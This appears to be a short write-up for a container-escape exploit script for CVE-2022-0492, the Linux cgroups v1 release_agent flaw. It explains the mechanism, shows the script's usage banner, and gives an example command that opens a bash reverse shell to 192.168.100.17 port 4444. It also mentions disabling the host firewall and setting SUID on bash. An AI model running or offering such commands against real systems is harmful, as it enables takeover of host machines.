Exploiting the vulnerability requires the attacker to have access to a Docker container running on a vulnerable system. Once exploited, the attacker can escape the container and gain complete control over the host system.

A vulnerability was found in the Linux kernel’s cgroup_release_agent_write in the kernel/cgroup/cgroup-v1.c function. This flaw, under certain circumstances, allows the use of the cgroups v1 release_agent feature to escalate privileges and bypass the namespace isolation unexpectedly.

More simply put, cgroups v1 has a feature called release_agent that runs a program when a process in the cgroup terminates. If notify_on_release is enabled, the kernel runs the release_agent binary as root. By editing the release_agent file, an attacker can execute their own binary with elevated privileges, taking control of the system. However, the release_agent file is owned by root, so only a user with root access can modify it.

# sh CVE-2022-0492.sh

[>] CVE-2022-0492 Docker Container Escape                                           V
[>] Execute this script in a Docker to check for vulnerability or to exploit it. (º___\/{
[>] Usage:
        sh CVE-2022-0492.sh    --checker                Verify if system is vulnerable.
        sh CVE-2022-0492.sh -c|--command <COMMAND>      Execute command on host machine.
        sh CVE-2022-0492.sh -h|--help                   Print the help panel.

[>] Example:
        sh CVE-2022-0492.sh --command 'bash -c "bash -i >& /dev/tcp/192.168.100.17/4444 0>&1"'

Root user in host machine pwned by disabling UFW and then sent a reverse shell.

Root user in host machine pwned by setting SUID to bash, also sent reverse shell.

• https://github.com/puckiestyle/CVE-2022-0492
• http://mon0dy.top/2022/04/16/%E8%BF%91%E6%9C%9FLinux%E5%86%85%E6%A0%B8%E6%8F%90%E6%9D%83%E6%BC%8F%E6%B4%9E%20exp%E6%B1%87%E6%80%BB/#cve-2022-0492